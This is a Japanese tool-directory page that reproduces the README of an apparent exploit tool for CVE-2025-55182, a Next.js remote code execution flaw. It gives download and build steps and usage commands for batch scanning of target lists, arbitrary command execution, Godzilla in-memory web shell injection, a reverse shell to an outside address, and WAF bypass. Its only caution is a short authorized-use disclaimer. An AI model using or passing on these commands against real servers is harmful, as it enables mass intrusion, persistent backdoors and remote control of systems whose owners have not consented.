Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-POC — GoベースのスキャナおよびCVE-2025-55182 (Next.js RCE) のエクスプロイトツール。バッチスキャン、コマンド実行、Godzillaメモリシェルインジェクション、リバースシェル、WAFバイパスをサポート。 | Kitploit
ツール/GitHubGitHub/luoqichen/cve-2025-55182-poc
脆弱性スキャナーエクスプロイトシェルコードウェブアプリケーション悪用WAFバイパスペネトレーションテストコマンド&コントロールペイロード開発
GitHubluoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

GoベースのスキャナおよびCVE-2025-55182 (Next.js RCE) のエクスプロイトツール。バッチスキャン、コマンド実行、Godzillaメモリシェルインジェクション、リバースシェル、WAFバイパスをサポート。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 Next.js RCE Scanner

License

CVE-2025-55182 の脆弱性スキャンおよびエクスプロイトツール。Next.js アプリケーションのリモートコード実行脆弱性を対象としています。バッチ検出、コマンド実行、哥斯拉メモリシェル注入、リバースシェル機能をサポートします。

⚠️ 本ツールはセキュリティ研究および許可されたテスト目的でのみ使用してください。不正使用は禁止です。

特徴

  • マルチターゲットスキャン:単一URL、ファイルリスト(1行1URL)、複数の.txtファイルを含むフォルダをサポート。
  • マルチスレッド並行処理:スレッド数をカスタマイズ可能で、スキャン効率を向上。
  • 脆弱性検証:乱数の積を計算して脆弱性の有無を検証。
  • コマンド実行:脆弱性ターゲット上で任意のシステムコマンドを実行(Linux/Windows対応)。
  • 哥斯拉メモリシェル注入:ワンクリックで哥斯拉メモリシェルの接続情報を生成。
  • リバースシェル:リバースシェル機能をサポート。
  • 結果保存:正常に悪用されたURLと詳細情報を自動でsuccess.jsonに保存し、オプションで脆弱性URLを指定ファイルに出力。
  • プロキシサポート:HTTPプロキシを設定可能で、Burp Suiteなどのツールとの連携が容易。
  • 進行状況表示:スキャンの進行状況、経過時間、推定残り時間などをリアルタイム表示。

[]

インストール

前提条件

  • Go 1.16 以降
  • Git

リポジトリのクローン

root@kitploit:~
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC

ビルド

root@kitploit:~
go build -o cve-2025-55182 main.go

実行

root@kitploit:~
./cve-2025-55182 -h

使用方法

パラメータ説明

例

単一ターゲットのスキャン

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000

ファイル内のターゲットを一括スキャン

root@kitploit:~
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt

コマンド実行

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -c "whoami"

哥斯拉メモリシェルの使用

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -g

注入に成功すると、ツールは哥斯拉の接続アドレス、パスワード、キー、リクエストヘッダー情報を出力します。

リバースシェル

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444

プロキシの有効化

root@kitploit:~
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10

出力説明

  • success.json:正常に悪用されたターゲットの詳細情報(コマンド出力、哥斯拉設定など)を自動保存。
  • -o で指定したファイル:脆弱性URLのリストを保存(1行に1つ)。

スキャン中はプログレスバーと発見された脆弱性がリアルタイム表示され、最後に統計情報が出力されます。

注意事項

  1. 許可の確認:無許可でのスキャンや攻撃は違法行為です。
  2. プロキシ使用:Burp Suite でトラフィックを確認する場合は、-p パラメータでプロキシを設定してください。
  3. 哥斯拉接続:哥斯拉の注入に成功したら、哥斯拉クライアントを使用して接続してください。パスワードとキーはランダムに生成されます。
  4. タイムアウト設定:ネットワークの遅いターゲットには、-to パラメータの値を適宜増やしてください。

免責事項

本ツールはセキュリティ研究および許可されたテスト目的のみに使用され、使用者は一切の法的責任を負うものとします。開発者は不正使用について一切の責任を負いません。

ライセンス

MIT

ツールをダウンロード
パラメータ型デフォルト値説明
-ustringなし単一ターゲットURL(例:http://example.com:3000)
-fstringなしURLリストを含むファイル(1行に1つ)
-dstringなし複数の .txt ファイルを含むフォルダ
-ostringなし出力ファイル(脆弱性URLを保存、1行に1つ)
-tint10同時スレッド数
-toint10リクエストタイムアウト(秒)
-cstringなし実行するコマンド(例:id)
-mstringなしモード:waf(WAF回避を有効化)
-pstringなしHTTPプロキシ(例:http://127.0.0.1:8080)
-gboolfalse哥斯拉メモリシェル注入を有効化
-rsstringなしリバースシェルアドレス(形式 IP:PORT)
-dvboolfalse詳細モード(各URLのスキャン過程を表示)
-esboolfalse機密情報スキャンモード